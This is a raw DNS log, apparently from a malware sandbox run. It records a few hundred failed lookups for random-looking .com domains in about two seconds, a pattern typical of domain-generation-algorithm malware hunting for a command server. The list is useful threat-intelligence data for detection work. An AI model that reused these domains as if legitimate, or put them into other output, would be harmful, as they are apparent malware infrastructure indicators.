Nov 11, 2024 18:13:17.763035059 CET	1.1.1.1	192.168.2.6	0x2431	Name error (3)	puvypul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:17.763638973 CET	1.1.1.1	192.168.2.6	0x7df0	Name error (3)	qekyrov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.267282963 CET	1.1.1.1	192.168.2.6	0x9a0c	Name error (3)	pujywiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.287590981 CET	1.1.1.1	192.168.2.6	0x2e84	Name error (3)	lyvyxyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.287961006 CET	1.1.1.1	192.168.2.6	0x9118	Name error (3)	gatyfaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.292754889 CET	1.1.1.1	192.168.2.6	0xa05e	Name error (3)	qeqyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.304302931 CET	1.1.1.1	192.168.2.6	0x2fb4	Name error (3)	qetyfop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.308439970 CET	1.1.1.1	192.168.2.6	0x2a17	Name error (3)	vonyzac.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.344424009 CET	1.1.1.1	192.168.2.6	0x519a	Name error (3)	volyquk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.355010033 CET	1.1.1.1	192.168.2.6	0xd428	Name error (3)	vowycut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.362931967 CET	1.1.1.1	192.168.2.6	0xac5c	Name error (3)	galyquw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.404061079 CET	1.1.1.1	192.168.2.6	0xa9d9	Name error (3)	galykiz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.414117098 CET	1.1.1.1	192.168.2.6	0x95cb	Name error (3)	qekykup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.414599895 CET	1.1.1.1	192.168.2.6	0x915d	Name error (3)	pupyboq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.415870905 CET	1.1.1.1	192.168.2.6	0x12ea	Name error (3)	lykyjux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.416335106 CET	1.1.1.1	192.168.2.6	0x6ea0	Name error (3)	pujyjup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.419368982 CET	1.1.1.1	192.168.2.6	0xf2da	Name error (3)	qebyteg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.420109034 CET	1.1.1.1	192.168.2.6	0x4d07	Name error (3)	vopybok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.422458887 CET	1.1.1.1	192.168.2.6	0xa7af	Name error (3)	gahyqub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.424094915 CET	1.1.1.1	192.168.2.6	0x551a	Name error (3)	vonypyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.424582958 CET	1.1.1.1	192.168.2.6	0xc1fb	Name error (3)	qexylal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.425007105 CET	1.1.1.1	192.168.2.6	0xeb7f	Name error (3)	qegyhev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.425018072 CET	1.1.1.1	192.168.2.6	0x95ac	Name error (3)	qedyfog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.429775953 CET	1.1.1.1	192.168.2.6	0x4fb0	Name error (3)	lyryfox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.431643009 CET	1.1.1.1	192.168.2.6	0x7925	Name error (3)	puvytag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.436918020 CET	1.1.1.1	192.168.2.6	0x9201	Name error (3)	vojyjyc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.438158035 CET	1.1.1.1	192.168.2.6	0x5ae7	Name error (3)	pumypyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.438168049 CET	1.1.1.1	192.168.2.6	0x8123	Name error (3)	purydip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.439189911 CET	1.1.1.1	192.168.2.6	0x1678	Name error (3)	lymyxex.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.439378023 CET	1.1.1.1	192.168.2.6	0xafa0	Name error (3)	lyryvur.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.439389944 CET	1.1.1.1	192.168.2.6	0x37b9	Name error (3)	qexyriq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.440066099 CET	1.1.1.1	192.168.2.6	0x1255	Name error (3)	lygyged.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.440711975 CET	1.1.1.1	192.168.2.6	0x8ac5	Name error (3)	pufymyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.441145897 CET	1.1.1.1	192.168.2.6	0x4190	Name error (3)	gatyviw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.441975117 CET	1.1.1.1	192.168.2.6	0x9377	Name error (3)	gacyzaw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.445060015 CET	1.1.1.1	192.168.2.6	0xb41f	Name error (3)	gacyroh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446326017 CET	1.1.1.1	192.168.2.6	0xfc46	Name error (3)	qedynaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.446508884 CET	1.1.1.1	192.168.2.6	0x70f9	Name error (3)	purycul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.447940111 CET	1.1.1.1	192.168.2.6	0x12fd	Name error (3)	lyvytan.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.448091984 CET	1.1.1.1	192.168.2.6	0x3abd	Name error (3)	lysyfin.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.451889992 CET	1.1.1.1	192.168.2.6	0x7892	Name error (3)	gahyhys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.451900959 CET	1.1.1.1	192.168.2.6	0x8766	Name error (3)	lysynaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.453654051 CET	1.1.1.1	192.168.2.6	0xfb6a	Name error (3)	qetyvil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455190897 CET	1.1.1.1	192.168.2.6	0x790	Name error (3)	qeqysuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.455802917 CET	1.1.1.1	192.168.2.6	0x4df7	Name error (3)	qegyqug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.456121922 CET	1.1.1.1	192.168.2.6	0x19c2	Name error (3)	vocyzek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.456203938 CET	1.1.1.1	192.168.2.6	0x90e0	Name error (3)	vofymem.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.456625938 CET	1.1.1.1	192.168.2.6	0x7d8e	Name error (3)	lymysud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.457257986 CET	1.1.1.1	192.168.2.6	0x8780	Name error (3)	puzylol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.458033085 CET	1.1.1.1	192.168.2.6	0x61da	Name error (3)	lygymyn.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.458641052 CET	1.1.1.1	192.168.2.6	0x6277	Name error (3)	puvyxeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.458651066 CET	1.1.1.1	192.168.2.6	0x281f	Name error (3)	ganypeb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.460594893 CET	1.1.1.1	192.168.2.6	0x3481	Name error (3)	vojyquf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.460681915 CET	1.1.1.1	192.168.2.6	0xf5bc	Name error (3)	vocyrom.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.461050034 CET	1.1.1.1	192.168.2.6	0x5ad0	Name error (3)	lyxywij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.461083889 CET	1.1.1.1	192.168.2.6	0xc014	Name error (3)	vowydic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.461896896 CET	1.1.1.1	192.168.2.6	0xafb0	Name error (3)	gadyneh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.463054895 CET	1.1.1.1	192.168.2.6	0xcbf9	Name error (3)	gaqycyz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.464726925 CET	1.1.1.1	192.168.2.6	0x85d3	Name error (3)	puzywuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.466027975 CET	1.1.1.1	192.168.2.6	0xd675	Name error (3)	lyxylor.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.466042995 CET	1.1.1.1	192.168.2.6	0xf24f	Name error (3)	volykit.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.466669083 CET	1.1.1.1	192.168.2.6	0x6f8c	Name error (3)	vofygaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.474170923 CET	1.1.1.1	192.168.2.6	0xa9f7	Name error (3)	pumyxep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.478235006 CET	1.1.1.1	192.168.2.6	0xb53a	Name error (3)	gadyfob.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.479536057 CET	1.1.1.1	192.168.2.6	0xb4a4	Name error (3)	gaqydus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.486319065 CET	1.1.1.1	192.168.2.6	0x8e9d	Name error (3)	pufygav.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.897942066 CET	1.1.1.1	192.168.2.6	0x6a9	Name error (3)	qebylov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.897977114 CET	1.1.1.1	192.168.2.6	0x66d1	Name error (3)	pujymel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.899736881 CET	1.1.1.1	192.168.2.6	0x7bb7	Name error (3)	ganyzas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.900196075 CET	1.1.1.1	192.168.2.6	0x4ef8	Name error (3)	qekyqyl.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.936651945 CET	1.1.1.1	192.168.2.6	0xac78	Name error (3)	lykymyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.936754942 CET	1.1.1.1	192.168.2.6	0x2d4c	Name error (3)	vopydum.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.945415020 CET	1.1.1.1	192.168.2.6	0xad2f	Name error (3)	puvyliv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.948174953 CET	1.1.1.1	192.168.2.6	0xbe71	Name error (3)	qexykug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.948194981 CET	1.1.1.1	192.168.2.6	0x8ce0	Name error (3)	qedyvuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.957294941 CET	1.1.1.1	192.168.2.6	0xb01c	Name error (3)	volyjym.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.966980934 CET	1.1.1.1	192.168.2.6	0x534	Name error (3)	pumytol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.972955942 CET	1.1.1.1	192.168.2.6	0xb090	Name error (3)	lymylij.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.974014997 CET	1.1.1.1	192.168.2.6	0x8416	Name error (3)	gadyduz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.975200891 CET	1.1.1.1	192.168.2.6	0xb65f	Name error (3)	qexyqyv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.976094961 CET	1.1.1.1	192.168.2.6	0x30e2	Name error (3)	gaqyzoh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.978514910 CET	1.1.1.1	192.168.2.6	0xa3d6	Name error (3)	gacykub.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.981806993 CET	1.1.1.1	192.168.2.6	0x2f69	Name error (3)	qegyfil.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.981868982 CET	1.1.1.1	192.168.2.6	0xf1f7	Name error (3)	vocyquc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.982374907 CET	1.1.1.1	192.168.2.6	0xf0d0	Name error (3)	vofybic.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.983653069 CET	1.1.1.1	192.168.2.6	0x6425	Name error (3)	lyxymed.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.983664989 CET	1.1.1.1	192.168.2.6	0x9185	Name error (3)	pufybop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.985205889 CET	1.1.1.1	192.168.2.6	0x8e4c	Name error (3)	pufydul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.986991882 CET	1.1.1.1	192.168.2.6	0xb60a	Name error (3)	gadyvis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.987270117 CET	1.1.1.1	192.168.2.6	0x34fe	Name error (3)	qekyheq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:18.995672941 CET	1.1.1.1	192.168.2.6	0x868e	Name error (3)	vofydut.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.001408100 CET	1.1.1.1	192.168.2.6	0xcbf9	Name error (3)	qeqyloq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.003703117 CET	1.1.1.1	192.168.2.6	0x4bc7	Name error (3)	galyheh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.003777981 CET	1.1.1.1	192.168.2.6	0xc213	Name error (3)	vonyrot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.010090113 CET	1.1.1.1	192.168.2.6	0x6623	Name error (3)	vowyzam.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.010407925 CET	1.1.1.1	192.168.2.6	0x8dda	Name error (3)	lyxyjun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.010988951 CET	1.1.1.1	192.168.2.6	0xe446	Name error (3)	qetysuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.011143923 CET	1.1.1.1	192.168.2.6	0xb0d6	Name error (3)	puzyjyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.012389898 CET	1.1.1.1	192.168.2.6	0x8431	Name error (3)	gatyduh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.013072014 CET	1.1.1.1	192.168.2.6	0xa37f	Name error (3)	lyryxen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.013088942 CET	1.1.1.1	192.168.2.6	0x720e	Name error (3)	lyvylod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016104937 CET	1.1.1.1	192.168.2.6	0x8c24	Name error (3)	pupycuv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016149044 CET	1.1.1.1	192.168.2.6	0x7bb6	Name error (3)	vowypek.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016285896 CET	1.1.1.1	192.168.2.6	0xba5c	Name error (3)	ganyriz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016416073 CET	1.1.1.1	192.168.2.6	0x5730	Name error (3)	qeqytal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016829014 CET	1.1.1.1	192.168.2.6	0x930d	Name error (3)	lyrysyj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.016911983 CET	1.1.1.1	192.168.2.6	0x4b5c	Name error (3)	puvywup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.017138004 CET	1.1.1.1	192.168.2.6	0x4754	Name error (3)	lyvywux.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.017322063 CET	1.1.1.1	192.168.2.6	0xa43a	Name error (3)	vopycyf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.017565966 CET	1.1.1.1	192.168.2.6	0xbcc2	Name error (3)	gatycyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.017874002 CET	1.1.1.1	192.168.2.6	0xe65f	Name error (3)	gacyqys.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.018465042 CET	1.1.1.1	192.168.2.6	0x903e	Name error (3)	qetyxeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.019336939 CET	1.1.1.1	192.168.2.6	0x9a74	Name error (3)	pupydig.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.023787975 CET	1.1.1.1	192.168.2.6	0x4a91	Name error (3)	gaqypew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.025197029 CET	1.1.1.1	192.168.2.6	0x7983	Name error (3)	lykygaj.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.032903910 CET	1.1.1.1	192.168.2.6	0xf75b	Name error (3)	puzymev.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.033236027 CET	1.1.1.1	192.168.2.6	0x2500	Name error (3)	puryxag.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.037342072 CET	1.1.1.1	192.168.2.6	0x923b	Name error (3)	lymytar.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.037636995 CET	1.1.1.1	192.168.2.6	0xe236	Name error (3)	qebyrip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.037878036 CET	1.1.1.1	192.168.2.6	0x73d1	Name error (3)	lygynox.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.038613081 CET	1.1.1.1	192.168.2.6	0xd812	Name error (3)	vojygok.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.038752079 CET	1.1.1.1	192.168.2.6	0xd2c5	Name error (3)	pujygaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.039607048 CET	1.1.1.1	192.168.2.6	0xa7ee	Name error (3)	gahyfow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.039618969 CET	1.1.1.1	192.168.2.6	0x24a0	Name error (3)	vocykif.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.040632963 CET	1.1.1.1	192.168.2.6	0x1a90	Name error (3)	purypyq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.045736074 CET	1.1.1.1	192.168.2.6	0x5ef5	Name error (3)	gahynaz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.046149969 CET	1.1.1.1	192.168.2.6	0x6c55	Name error (3)	lysyvud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.046969891 CET	1.1.1.1	192.168.2.6	0x7aee	Name error (3)	lygyfir.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.047802925 CET	1.1.1.1	192.168.2.6	0xe27d	Name error (3)	vojymet.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.053527117 CET	1.1.1.1	192.168.2.6	0xb370	Name error (3)	qegynap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.598148108 CET	1.1.1.1	192.168.2.6	0x7485	Name error (3)	gaqykus.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.599407911 CET	1.1.1.1	192.168.2.6	0xd6d5	Name error (3)	vonykuk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.600624084 CET	1.1.1.1	192.168.2.6	0x5013	Name error (3)	lygysen.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.602128029 CET	1.1.1.1	192.168.2.6	0x2218	Name error (3)	vowykuc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.602781057 CET	1.1.1.1	192.168.2.6	0x6c9c	Name error (3)	purylup.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.604352951 CET	1.1.1.1	192.168.2.6	0xf492	Name error (3)	qegysyg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.606216908 CET	1.1.1.1	192.168.2.6	0x6602	Name error (3)	vocymak.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.609632969 CET	1.1.1.1	192.168.2.6	0x70a3	Name error (3)	qetylip.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.613518000 CET	1.1.1.1	192.168.2.6	0x5efa	Name error (3)	vojyduf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.616766930 CET	1.1.1.1	192.168.2.6	0x4d31	Name error (3)	gatyzoz.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.617301941 CET	1.1.1.1	192.168.2.6	0x3513	Name error (3)	lyvymej.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.617929935 CET	1.1.1.1	192.168.2.6	0x7d36	Name error (3)	pufypeg.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.620579004 CET	1.1.1.1	192.168.2.6	0xf9d3	Name error (3)	qexynol.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.623691082 CET	1.1.1.1	192.168.2.6	0x11a7	Name error (3)	gacynow.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.625758886 CET	1.1.1.1	192.168.2.6	0xb71f	Name error (3)	pujyduv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.627140999 CET	1.1.1.1	192.168.2.6	0xf757	Name error (3)	gahydyb.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.630466938 CET	1.1.1.1	192.168.2.6	0xfb25	Name error (3)	lyrylix.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.632394075 CET	1.1.1.1	192.168.2.6	0x72b4	Name error (3)	puvymaq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.673238039 CET	1.1.1.1	192.168.2.6	0xa1d0	Name error (3)	vopyzot.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.674959898 CET	1.1.1.1	192.168.2.6	0xcfd	Name error (3)	pupyxal.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.679373980 CET	1.1.1.1	192.168.2.6	0x45af	Name error (3)	lykyfud.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.681509972 CET	1.1.1.1	192.168.2.6	0xf463	Name error (3)	qebyqeq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.683926105 CET	1.1.1.1	192.168.2.6	0x2fb9	Name error (3)	purytov.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.684943914 CET	1.1.1.1	192.168.2.6	0x911b	Name error (3)	gaqyrib.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.692703962 CET	1.1.1.1	192.168.2.6	0x4300	Name error (3)	pumyliq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.695445061 CET	1.1.1.1	192.168.2.6	0xeb06	Name error (3)	ganyqyh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.695718050 CET	1.1.1.1	192.168.2.6	0xe9c8	Name error (3)	gadycew.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.695735931 CET	1.1.1.1	192.168.2.6	0xcce1	Name error (3)	qekynog.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.696712017 CET	1.1.1.1	192.168.2.6	0x69aa	Name error (3)	ganykuw.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.697189093 CET	1.1.1.1	192.168.2.6	0xa36e	Name error (3)	qekyfiv.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.698446035 CET	1.1.1.1	192.168.2.6	0x8ec5	Name error (3)	gatypas.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.699491978 CET	1.1.1.1	192.168.2.6	0x91d5	Name error (3)	qebykul.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.699503899 CET	1.1.1.1	192.168.2.6	0x12f1	Name error (3)	pupypep.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.702456951 CET	1.1.1.1	192.168.2.6	0xd738	Name error (3)	lyrytod.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.702549934 CET	1.1.1.1	192.168.2.6	0xc112	Name error (3)	lysysyx.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.705252886 CET	1.1.1.1	192.168.2.6	0xbf62	Name error (3)	lymywun.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.707679987 CET	1.1.1.1	192.168.2.6	0xfe35	Name error (3)	vofycyk.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.712209940 CET	1.1.1.1	192.168.2.6	0x106	Name error (3)	galynab.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.712291002 CET	1.1.1.1	192.168.2.6	0x77e8	Name error (3)	qeqyrug.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717082977 CET	1.1.1.1	192.168.2.6	0xcf23	Name error (3)	qedyxel.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717118979 CET	1.1.1.1	192.168.2.6	0xb780	Name error (3)	gahyvuh.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717159033 CET	1.1.1.1	192.168.2.6	0x4cb2	Name error (3)	puzygop.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717263937 CET	1.1.1.1	192.168.2.6	0x7032	Name error (3)	qegyvuq.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717286110 CET	1.1.1.1	192.168.2.6	0x9e6d	Name error (3)	galyfis.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717297077 CET	1.1.1.1	192.168.2.6	0xb132	Name error (3)	volygoc.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717530012 CET	1.1.1.1	192.168.2.6	0x6d89	Name error (3)	qexyhap.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717544079 CET	1.1.1.1	192.168.2.6	0xc242	Name error (3)	volymaf.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717555046 CET	1.1.1.1	192.168.2.6	0x5e02	Name error (3)	lyxygax.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.717667103 CET	1.1.1.1	192.168.2.6	0x4abb	Name error (3)	lykynon.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.719280958 CET	1.1.1.1	192.168.2.6	0xe901	Name error (3)	lyvyjyr.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.719294071 CET	1.1.1.1	192.168.2.6	0xd5fd	Name error (3)	vopypec.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.723707914 CET	1.1.1.1	192.168.2.6	0x232c	Name error (3)	vojybim.com	none	none	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:13:19.724256039 CET	1.1.1.1	192.168.2.6	0x4a5d	Name error (3)	qetytav.com	none	none	A (IP address)	IN (0x0001)	false
